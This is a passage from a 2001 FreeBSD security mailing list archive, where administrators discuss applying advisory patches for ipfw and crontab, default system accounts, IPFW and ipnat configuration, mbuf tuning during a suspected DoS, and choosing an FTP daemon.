actually checking this! ishizuka@ish.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message HotBot - Search smarter. http://www.hotbot.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 23 19:56: 0 2001 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 8758737B401 for ; Tue, 23 Jan 2001 19:55:42 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id f0O3xDY25410; Tue, 23 Jan 2001 19:59:13 -0800 (PST) (envelope-from kris) Date: Tue, 23 Jan 2001 19:59:13 -0800 From: Kris Kennaway To: bob Dobolina Cc: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:08.ipfw Message-ID: <20010123195913.B24502@citusc17.usc.edu> References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="s/l3CgOIzMHHjg/5" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from devolve@hotbot.com on Tue, Jan 23, 2001 at 07:17:00PM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --s/l3CgOIzMHHjg/5 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, Jan 23, 2001 at 07:17:00PM -0800, bob Dobolina wrote: > Hmm, well it looks like the date of ipfw-4.x.patch.asc is in the > year 2000, while ipfw-4.x.patch is in the year 2001. This is > starting to get a bit unsettling. eh? Kris --=20 NOTE: To fetch an updated copy of my GPG key which has not expired, finger kris@FreeBSD.org --s/l3CgOIzMHHjg/5 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6blMRWry0BWjoQKURAjawAJ0Zo3q+YQToYXvn0VwPiIHdXi54RgCgm4cl bUelYWEwbP84CEukljNZtrI= =6dKu -----END PGP SIGNATURE----- --s/l3CgOIzMHHjg/5-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 23 20: 1:34 2001 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 418AE37B404 for ; Tue, 23 Jan 2001 20:01:17 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id f0O44lG25560; Tue, 23 Jan 2001 20:04:47 -0800 (PST) (envelope-from kris) Date: Tue, 23 Jan 2001 20:04:47 -0800 From: Kris Kennaway To: Todd Backman Cc: security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:08.ipfw Message-ID: <20010123200447.B25436@citusc17.usc.edu> References: <20010123210823.349E837B402@hub.freebsd.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="jq0ap7NbKX2Kqbes" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from todd@flyingcroc.net on Tue, Jan 23, 2001 at 06:47:08PM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --jq0ap7NbKX2Kqbes Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Tue, Jan 23, 2001 at 06:47:08PM -0800, Todd Backman wrote: >=20 > Anyone else failing here?: >=20 > Patching file sys/netinet/ip_fw.c using Plan A... > Hunk #1 succeeded at 244. > Hunk #2 failed at 1214. We don't support 4.0 for security advisories..the patch applies to 4.2-RELEASE, but I didn't test earlier releases. This should probably have been more explicit in the advisory. If you ask nicely, someone may generate you an unofficial patch against 4.0, otherwise you'll have to upgrade or do it yourself. Kris --=20 NOTE: To fetch an updated copy of my GPG key which has not expired, finger kris@FreeBSD.org --jq0ap7NbKX2Kqbes Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6blReWry0BWjoQKURAjkAAJ9MpGlS9Rcy2BWjxPwcgUprf4vTSgCdHZbu vyP4stmTubt8+nn77UNOf/g= =9Mwp -----END PGP SIGNATURE----- --jq0ap7NbKX2Kqbes-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 23 21:22:33 2001 Delivered-To: freebsd-security@freebsd.org Received: from ducky.nz.freebsd.org (ns1.unixathome.org [203.79.82.27]) by hub.freebsd.org (Postfix) with ESMTP id 111BB37B400 for ; Tue, 23 Jan 2001 21:22:15 -0800 (PST) Received: from xeon (xeon.unixathome.org [192.168.0.18]) by ducky.nz.freebsd.org (8.9.3/8.9.3) with SMTP id SAA09697 for ; Wed, 24 Jan 2001 18:22:13 +1300 (NZDT) Message-Id: <200101240522.SAA09697@ducky.nz.freebsd.org> To: security@freebsd.org From: Dan Langille Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:09.crontab Date: Wed, 24 Jan 2001 05:22:13 GMT X-Mailer: Endymion MailMan Professional Edition v3.0.29 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > # cd /usr/src/usr.sbin/cron/crontab > # patch -p < /path/to/patch > # make depend && make all install Ummm, is this to be expected? [root@ducky:/usr/src/usr.sbin/cron/crontab] # make depend && make all install rm -f .depend mkdep -f .depend -a -I/usr/src/usr.sbin/cron/crontab/../cron crontab.c cd /usr/src/usr.sbin/cron/crontab; make _EXTRADEPEND echo crontab: /usr/lib/libc.a /usr/src/usr.sbin/cron/crontab/../lib/libcron.a /usr/lib/libutil.a >> .depend Warning: Object directory not changed from original /usr/src/usr.sbin/cron/crontab cc -O -pipe -I/usr/src/usr.sbin/cron/crontab/../cron -c crontab.c cc -O -pipe -I/usr/src/usr.sbin/cron/crontab/../cron -o crontab crontab.o /usr/src/usr.sbin/cron/crontab/../lib/libcron.a -lutil cc: /usr/src/usr.sbin/cron/crontab/../lib/libcron.a: No such file or directory *** Error code 1 --------------------------------------------- This message was sent using Endymion MailMan. http://www.endymion.com/products/mailman/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 23 21:48:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from ducky.nz.freebsd.org (ns1.unixathome.org [203.79.82.27]) by hub.freebsd.org (Postfix) with ESMTP id B3D3837B400 for ; Tue, 23 Jan 2001 21:48:05 -0800 (PST) Received: from xeon (xeon.unixathome.org [192.168.0.18]) by ducky.nz.freebsd.org (8.9.3/8.9.3) with SMTP id SAA09961; Wed, 24 Jan 2001 18:47:58 +1300 (NZDT) Message-Id: <200101240547.SAA09961@ducky.nz.freebsd.org> To: Anil Jangity Cc: freebsd-security@freebsd.org From: Dan Langille Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-01:09.crontab Date: Wed, 24 Jan 2001 05:47:58 GMT X-Mailer: Endymion MailMan Professional Edition v3.0.29 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Thant did it. thanks. > Go up one level (/usr/src/usr.sbin/cron) and then re-run make. > > Dan Langille wrote: > > > > > # cd /usr/src/usr.sbin/cron/crontab > > > # patch -p < /path/to/patch > > > # make depend && make all install > > > > Ummm, is this to be expected? > > > > [root@ducky:/usr/src/usr.sbin/cron/crontab] # make depend && make all install > > rm -f .depend > > mkdep -f .depend -a -I/usr/src/usr.sbin/cron/crontab/../cron crontab.c > > cd /usr/src/usr.sbin/cron/crontab; make _EXTRADEPEND > > echo crontab: /usr/lib/libc.a /usr/src/usr.sbin/cron/crontab/../lib/libcron.a > > /usr/lib/libutil.a >> .depend > > Warning: Object directory not changed from original > > /usr/src/usr.sbin/cron/crontab > > cc -O -pipe -I/usr/src/usr.sbin/cron/crontab/../cron -c crontab.c > > cc -O -pipe -I/usr/src/usr.sbin/cron/crontab/../cron -o crontab crontab.o > > /usr/src/usr.sbin/cron/crontab/../lib/libcron.a -lutil > > cc: /usr/src/usr.sbin/cron/crontab/../lib/libcron.a: No such file or directory > > *** Error code 1 > > > > --------------------------------------------- > > This message was sent using Endymion MailMan. > > http://www.endymion.com/products/mailman/ > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > -- Dan Langille - novice in training --------------------------------------------- This message was sent using Endymion MailMan. http://www.endymion.com/products/mailman/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jan 23 23: 7:15 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.interactivate.com (unknown [63.141.73.15]) by hub.freebsd.org (Postfix) with ESMTP id 463AB37B69F; Tue, 23 Jan 2001 23:06:48 -0800 (PST) Received: from interactivate.com (snakcx408168-b.@cx408168-b.escnd1.sdca.home.com [24.20.227.61]) by mail.interactivate.com (8.11.1/8.11.1) with ESMTP id f0O7T5V61581; Tue, 23 Jan 2001 23:29:05 -0800 (PST) (envelope-from larry@interactivate.com) Message-ID: <3A6E7F77.6DFC4A3E@interactivate.com> Date: Tue, 23 Jan 2001 23:08:39 -0800 From: Lawrence Sica Organization: Interactivate, Inc. X-Mailer: Mozilla 4.76 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: Guillermo Leandro Cc: freebsd-security@FreeBSD.ORG, freebsd-hackers@FreeBSD.ORG Subject: Re: Default users and the passwords References: <01012315244000.00612@aristoteles.local.galileo.or.cr> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Guillermo Leandro wrote: > Hi everybody! > > FreeBSD, like almost all Unix OS, has other default users, like uucp, > operator, etc. Since this users cames with the FreeBSD distribution, where > can I find their passwords? > they don't have any, the pseudo users and system accounts dont have a login shell and their passwords should be set to * as well. Be careful if you remove them since on a make world certain users are expected, same with groups. > > Another thing, why is there another uid 0 called toor? Isn't it a potential > security hole? > toor is a big debate for many, its meant to give you another root shell with a differing shell, like bash,zsh,ksh whatever. Reason is you dont wan to mess with root's shell. Someone compared root to a loaded weapon recently, its a good analogy since you dont use root unless you mean it and you have to be careful. --Larry To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 24 5: 7:19 2001 Delivered-To: freebsd-security@freebsd.org Received: from tomts5-srv.bellnexxia.net (tomts5.bellnexxia.net [209.226.175.25]) by hub.freebsd.org (Postfix) with ESMTP id 71E5637B698; Wed, 24 Jan 2001 05:06:54 -0800 (PST) Received: from johnny2k ([64.229.35.40]) by tomts5-srv.bellnexxia.net (InterMail vM.4.01.03.00 201-229-121) with SMTP id <20010124130653.ITSH27935.tomts5-srv.bellnexxia.net@johnny2k>; Wed, 24 Jan 2001 08:06:53 -0500 Message-ID: <000a01c08606$9041efe0$2823e540@johnny2k> From: "John Telford" To: , Subject: IPFW modify the "simple" rule set 4.2 to allow ... Date: Wed, 24 Jan 2001 08:07:11 -0500 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0007_01C085DC.A7368000" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6700 X-Mimeole: Produced By Microsoft MimeOLE V5.00.2919.6700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_0007_01C085DC.A7368000 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable I'd like to get the settings in the right place so I'm asking the = experts. Freebsd 4.2 release with firewall type set to "simple".=20 It works but I'd like to allow 2 things through. SSH connections from the public side to the firewall. Connections to a Web server on the inside. Thanks in advance. John. ------=_NextPart_000_0007_01C085DC.A7368000 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
I'd like to get the settings in the = right place so=20 I'm asking the experts. Freebsd 4.2 release with firewall type set to = "simple".=20
It works but I'd like to allow 2 things = through.
SSH connections from the public side to = the=20 firewall.
Connections to a Web server on the = inside.
 
Thanks in advance. = John.
------=_NextPart_000_0007_01C085DC.A7368000-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 24 5:24:18 2001 Delivered-To: freebsd-security@freebsd.org Received: from supermall.dk (mail.absolute-promotion.dk [195.41.95.9]) by hub.freebsd.org (Postfix) with SMTP id 0358437B400 for ; Wed, 24 Jan 2001 05:24:01 -0800 (PST) Received: (qmail 20459 invoked from network); 24 Jan 2001 13:14:12 -0000 Received: from unknown (HELO incorp.dk) (195.41.95.19) by mail.absolute-promotion.dk with SMTP; 24 Jan 2001 13:14:12 -0000 Message-ID: <3A6EE52B.B37F65EB@incorp.dk> Date: Wed, 24 Jan 2001 14:22:35 +0000 From: Dennis Rand X-Mailer: Mozilla 4.76 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: IPNAT Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi there I'm trying to setup a network with internal ip's like 192.168.0.* but i have this problem that i also have 2 webserveres running on the inside with to external IP attached to it then it would be great if i could get them translated from internal IP's to External IP's and the other way around so if someone wanted to contact the webserveres the FreeBSD machine would translate the external IP to the specific internal machine. So i've made a rc.nat and now i just need to know how to set this file up so i can get it to work properly with ipnat -D -f /etc/rc.nat -- Med Venlig Hilsen / Best regards __________________________ Dennis Rand inCorp A/S - Odense Middelfartvej 9-11 5000 Odense C Tlf.: 70 22 55 30 Fax.: 63 12 55 39 Email: dr@incorp.dk http://www.inCorp.dk To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 24 6:33:25 2001 Delivered-To: freebsd-security@freebsd.org Received: from neo.spbnit.ru (mail.spbnit.ru [212.48.192.115]) by hub.freebsd.org (Postfix) with ESMTP id 853AA37B6A2 for ; Wed, 24 Jan 2001 06:33:06 -0800 (PST) Received: from localhost.localdomain (ppp-200.pool-121.spbnit.ru [212.48.199.200]) by neo.spbnit.ru (8.9.3+mPOP/8.9.3) with SMTP id RAA37500 for ; Wed, 24 Jan 2001 17:33:01 +0300 (MSK) From: "Mr. Blackman" Reply-To: blackman@blackman.ru To: freebsd-security@freebsd.org Subject: DoS: socket: No buffer space available Date: Wed, 24 Jan 2001 17:32:52 +0300 X-Mailer: KMail [version 1.0.29] Content-Type: text/plain MIME-Version: 1.0 Message-Id: <01012417332701.31962@localhost.localdomain> Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello! Last days our server was DoSed (I'm sure). Ok, facts: The Problem: IP socket: No buffer space available UNIX Socket : No buffer space available Victim: FreeBSD 3.4 Kernel compiled with these options: options ICMP_BANDLIM options TCP_DROP_SYNFIN options TCP_RESTRICT_RST options IPFIREWALL options IPFIREWALL_VERBOSE options IPFIREWALL_VERBOSE_LIMIT=10 /etc/rc.conf: tcp_drop_synfin="YES" tcp_restrict_rst="YES" icmp_drop_redirect="YES" icmp_log_redirect="YES" firewall_enable="YES" firewall_script="/etc/rc.firewall" firewall_type="/etc/rc.firewall" firewall_quiet="NO" ### TCP STACK TUNING ### # TCP send/receive spaces sysctl -w net.inet.tcp.sendspace=32768 sysctl -w net.inet.tcp.recvspace=32768 # Socket queue defense against SYN attacks sysctl -w kern.ipc.somaxconn=1024 #!!! sysctl -w net.inet.icmp.drop_redirect=1 sysctl -w net.inet.icmp.log_redirect=1 sysctl -w net.inet.ip.redirect=0 sysctl -w net.inet6.ip6.redirect=0 sysctl -w net.link.ether.inet.max_age=1200 sysctl -w net.inet.ip.sourceroute=0 sysctl -w net.inet.ip.accept_sourceroute=0 sysctl -w net.inet.icmp.bmcastecho=0 sysctl -w net.inet.icmp.maskrepl=0 ### END TCP STACK TUNING ### On this server all packets are filtered with IPFW and _all_, except 53 udp are in "deny". Yes, I know about "named DoS", but the server is completely down. And only reboot solve the problem. Where is the problem, where is salvation?:) Thank you for attention. Mr. Blackman, Security Officer. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 24 7:18:38 2001 Delivered-To: freebsd-security@freebsd.org Received: from liberty.bulinfo.net (liberty.bulinfo.net [212.72.195.7]) by hub.freebsd.org (Postfix) with SMTP id 3CE3D37B400 for ; Wed, 24 Jan 2001 07:18:18 -0800 (PST) Received: (qmail 58371 invoked from network); 24 Jan 2001 15:18:09 -0000 Received: from pythia.bulinfo.net (HELO bulinfo.net) (212.72.195.5) by liberty.bulinfo.net with SMTP; 24 Jan 2001 15:18:09 -0000 Message-ID: <3A6EF228.60C10497@bulinfo.net> Date: Wed, 24 Jan 2001 17:18:00 +0200 From: Krassimir Slavchev X-Mailer: Mozilla 4.76 [en] (X11; U; Linux 2.2.13 i686) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: Re: DoS: socket: No buffer space available References: <01012417332701.31962@localhost.localdomain> Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, Can you provide output of netstat -m? "Mr. Blackman" wrote: > Hello! > > Last days our server was DoSed (I'm sure). > Ok, facts: > The Problem: > IP socket: No buffer space available > UNIX Socket : No buffer space available > > Victim: FreeBSD 3.4 > Kernel compiled with these options: > options ICMP_BANDLIM > options TCP_DROP_SYNFIN > options TCP_RESTRICT_RST > options IPFIREWALL > options IPFIREWALL_VERBOSE > options IPFIREWALL_VERBOSE_LIMIT=10 > > /etc/rc.conf: > tcp_drop_synfin="YES" > tcp_restrict_rst="YES" > icmp_drop_redirect="YES" > icmp_log_redirect="YES" > firewall_enable="YES" > firewall_script="/etc/rc.firewall" > firewall_type="/etc/rc.firewall" > firewall_quiet="NO" > > ### TCP STACK TUNING ### > # TCP send/receive spaces > sysctl -w net.inet.tcp.sendspace=32768 > sysctl -w net.inet.tcp.recvspace=32768 > # Socket queue defense against SYN attacks > sysctl -w kern.ipc.somaxconn=1024 #!!! > sysctl -w net.inet.icmp.drop_redirect=1 > sysctl -w net.inet.icmp.log_redirect=1 > sysctl -w net.inet.ip.redirect=0 > sysctl -w net.inet6.ip6.redirect=0 > sysctl -w net.link.ether.inet.max_age=1200 > sysctl -w net.inet.ip.sourceroute=0 > sysctl -w net.inet.ip.accept_sourceroute=0 > sysctl -w net.inet.icmp.bmcastecho=0 > sysctl -w net.inet.icmp.maskrepl=0 > ### END TCP STACK TUNING ### > > On this server all packets are filtered with IPFW and _all_, except 53 udp are > in "deny". > > Yes, I know about "named DoS", but the server is completely down. > And only reboot solve the problem. > > Where is the problem, where is salvation?:) > > Thank you for attention. > > Mr. Blackman, Security Officer. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 24 7:18:48 2001 Delivered-To: freebsd-security@freebsd.org Received: from neo.spbnit.ru (mail.spbnit.ru [212.48.192.115]) by hub.freebsd.org (Postfix) with ESMTP id 555D037B698 for ; Wed, 24 Jan 2001 07:18:24 -0800 (PST) Received: from localhost.localdomain (ppp-195.pool-113.spbnit.ru [212.48.192.195]) by neo.spbnit.ru (8.9.3+mPOP/8.9.3) with SMTP id SAA39725; Wed, 24 Jan 2001 18:18:17 +0300 (MSK) From: "Mr. Blackman" Reply-To: blackman@blackman.ru To: "Sean O'Connell" Subject: Re: DoS: socket: No buffer space available Date: Wed, 24 Jan 2001 18:07:57 +0300 X-Mailer: KMail [version 1.0.29] Content-Type: text/plain References: <01012417332701.31962@localhost.localdomain> <20010124093824.C64654@stat.Duke.EDU> In-Reply-To: <20010124093824.C64654@stat.Duke.EDU> Cc: freebsd-security@freebsd.org MIME-Version: 1.0 Message-Id: <01012418184202.31962@localhost.localdomain> Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org options NMBCLUSTERS=32768 options NSFBUFS=32768 ...always- this is the first thing, that I made on new servers. netstat -m - 30% used or so... I would like to know all possible reasons of socket: no buffer space available (for example: $sudo bash: socket: no buffer space available) > > I would guess MBUF exhaustion as the cause. Look at > > netstat -m > > /sys/i386/conf/LINT has some tuning examples. I think this works > under RELENG_3 > > options NMBCLUSTERS=8192 > > (or bigger). You can also up the # of maxusers to 128 or something > as this will resize most of the kernel tables. I fear a reboot may > be the only short term fix. > > S > -- > Sean O'Connell Email: sean@stat.Duke.EDU > Institute of Statistics and Decision Sciences Phone: (919) 684-5419 > Duke University Fax: (919) 684-8594 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 24 7:45:25 2001 Delivered-To: freebsd-security@freebsd.org Received: from hex.databits.net (hex.databits.net [207.29.192.16]) by hub.freebsd.org (Postfix) with SMTP id 6976637B404 for ; Wed, 24 Jan 2001 07:45:07 -0800 (PST) Received: (qmail 5151 invoked by uid 1001); 24 Jan 2001 15:46:31 -0000 Date: Wed, 24 Jan 2001 10:46:31 -0500 From: Pete Fritchman To: John Telford Cc: freebsd-security@freebsd.org Subject: Re: IPFW modify the "simple" rule set 4.2 to allow ... Message-ID: <20010124104631.B4887@databits.net> References: <000a01c08606$9041efe0$2823e540@johnny2k> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <000a01c08606$9041efe0$2823e540@johnny2k>; from j.telford@sympatico.ca on Wed, Jan 24, 2001 at 08:07:11AM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org [ freebsd-net removed ] ++ 24/01/01 08:07 -0500 - John Telford: >I'd like to get the settings in the right place so I'm asking the experts. Freebsd 4.2 release with firewall type set to "simple". >It works but I'd like to allow 2 things through. >SSH connections from the public side to the firewall. You'll need to modify /etc/rc.firewall. Look through until you see something like: [Ss][Ii][Mm][Pp][Ll][Ee]) ############ # This is a prototype setup for a simple firewall. Configure this # machine as a named server and ntp server, and point all the machines # on the inside at this machine for those services. ############ Scroll down and before the command that says "Reject&Log all setup of incoming connections ...", add: # Allow access to SSH ${fwcmd} add pass tcp from any to ${oip} 22 setup >Connections to a Web server on the inside. I'm not quite sure what you mean - do you have a webserver on another port? WWW is already allowed through in the simple firewall type. > >Thanks in advance. John. -pete -- Pete Fritchman Databits Network Services, Inc. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 24 7:49:10 2001 Delivered-To: freebsd-security@freebsd.org Received: from hex.databits.net (hex.databits.net [207.29.192.16]) by hub.freebsd.org (Postfix) with SMTP id 60E9E37B404 for ; Wed, 24 Jan 2001 07:48:51 -0800 (PST) Received: (qmail 5222 invoked by uid 1001); 24 Jan 2001 15:50:15 -0000 Date: Wed, 24 Jan 2001 10:50:15 -0500 From: Pete Fritchman To: Dennis Rand Cc: freebsd-security@freebsd.org Subject: Re: IPNAT Message-ID: <20010124105015.C4887@databits.net> References: <3A6EE52B.B37F65EB@incorp.dk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3A6EE52B.B37F65EB@incorp.dk>; from dr@incorp.dk on Wed, Jan 24, 2001 at 02:22:35PM +0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In the future, this probably isn't appropriate for -security. Try -questions. You're probably interested in the "rdr" keyword for ipnat. You can find a great howto at: http://www.obfuscation.org/ipf/ -pete. ++ 24/01/01 14:22 +0000 - Dennis Rand: >Hi there > >I'm trying to setup a network with internal ip's like 192.168.0.* but i >have this problem that i also have 2 webserveres >running on the inside with to external IP attached to it then it would >be great if i could get them translated from internal IP's to External >IP's and the other way around so if someone wanted to contact the >webserveres the FreeBSD machine would translate the external IP to the >specific internal machine. > >So i've made a rc.nat and now i just need to know how to set this file >up so i can get it to work properly >with ipnat -D -f /etc/rc.nat > >-- >Med Venlig Hilsen / Best regards > __________________________ > > Dennis Rand > inCorp A/S - Odense > Middelfartvej 9-11 > 5000 Odense C > > Tlf.: 70 22 55 30 > Fax.: 63 12 55 39 > Email: dr@incorp.dk > http://www.inCorp.dk > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message -- Pete Fritchman Databits Network Services, Inc. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 24 9:29:19 2001 Delivered-To: freebsd-security@freebsd.org Received: from tmd.df.ru (cr219023-a.rchrd1.on.wave.home.com [24.43.203.140]) by hub.freebsd.org (Postfix) with ESMTP id C3F8E37B400 for ; Wed, 24 Jan 2001 09:28:57 -0800 (PST) Received: (from tmd@localhost) by tmd.df.ru (8.11.1/8.11.1) id f0OHbw397620; Wed, 24 Jan 2001 12:37:58 -0500 (EST) (envelope-from tmd) Date: Wed, 24 Jan 2001 12:37:57 -0500 From: Vlad To: Artem Koutchine Cc: freebsd-security@freebsd.org Subject: Re: Which is the most secure and reliable ftp daemon Message-ID: <20010124123757.B97354@tmd.df.ru> Mail-Followup-To: Vlad , Artem Koutchine , freebsd-security@freebsd.org References: <000901c08629$c674d320$0c00a8c0@ipform.ru> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <000901c08629$c674d320$0c00a8c0@ipform.ru>; from matrix@ipform.ru on Wed, Jan 24, 2001 at 08:19:06PM +0300 X-Operating-System: FreeBSD 4.2-STABLE Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Jan 24, 2001 at 08:19:06PM +0300, Artem Koutchine (matrix@ipform.ru) wrote: > Hello! > > I just audited my system for security and it came up that i am > running inetd ONLY because ftp daemon is needed. > > I know that thare are many good ftp daemons, but since > i never tested any of them in real production environment > i don't know which to pick. > > Please, share your experience with different ftp daemons. > I need something very reliable, secure and configurable. > Currently i am thinking about wu-ftpd and proftpd, but both > of them have history of security flaws. > > If i find, i could finaly turn off inetd and save myself some > RAM and maybe even tighten security. > > Regards, > Artem It is impossible to state that a certain daemon is the most secure one - all depends on the way you configure it and the level of security of your whole system. Personally, I prefer PROFTPD (as most people do) over other alternatives, particularly because of its fexible configuration. If you are planning to run anonymous ftp, then proftpd is definitely your choice. If not, you might consider FBSD's ftpd, which is rather good (if you chroot users in their directories/etc). Hope that helps. - -- tmd To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jan 24 11:12:51 2001 Delivered-To: freebsd-security@freebsd.org Received: from obivon.nren.nasa.gov (obivon.nren.nasa.gov [198.10.1.39]) by hub.freebsd.org (Postfix) with ESMTP id ABEEA37B400; Wed, 24 Jan 2001 11:12:28 -0800 (PST) Received: from localhost (matt@localhost) by obivon.nren.nasa.gov (8.10.2/8.10.2) with ESMTP id f0OJCO615395; Wed, 24 Jan 2001 11:12:24 -0800 (PST) X-Authentication-Warning: obivon.nren.nasa.gov: matt owned process doing -bs Date: Wed, 24 Jan 2001 11:12:24 -0800 (PST) From: Matt Chew Spence To: Lawrence Sica Cc: Guillermo Leandro , , Subject: Re: Default users and the passwords In-Reply-To: <3A6E7F77.6DFC4A3E@interactivate.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Another question in a similar vein: Which, if any (besides root and nobody, which are a given), of these default accounts are critical to the basic functionality of the box? Is there a list somewhere where I can match these phantom/daemon users to their functionality/dependencies? I'd just as soon blow away things I'll never use, (uucp, xten, etc), but I am loathe to do so without a better understanding of the ramifications thereof.... Any information would be greatly appreciated, Matt On Tue, 23 Jan 2001, Lawrence Sica wrote: > Guillermo Leandro wrote: > > > Hi everybody! > > > > FreeBSD, like almost all Unix OS, has other default users, like uucp, > > operator, etc. Since this users cames with the FreeBSD distribution, where > > can I find their passwords? > > > > they don't have any, the pseudo users and system accounts dont have a login > shell and their passwords should be set to * as well. Be careful if you > remove them since on a make world certain users are expected, same with > groups. > > > > > Another thing, why is there another uid 0 called toor? Isn't it a potential > > security hole? > > > > toor is a big debate for many, its meant to give you another root shell with > a differing shell, like bash,zsh,ksh whatever. Reason is you dont wan to mess > with root's shell. Someone compared root to a loaded weapon recently, its a > good analogy since you dont use root unless you mean it and you have to be > careful. > > --Larry > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > _/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/ Matt Chew Spence Network Engineer/Systems Engineer matt@nren.nasa.gov 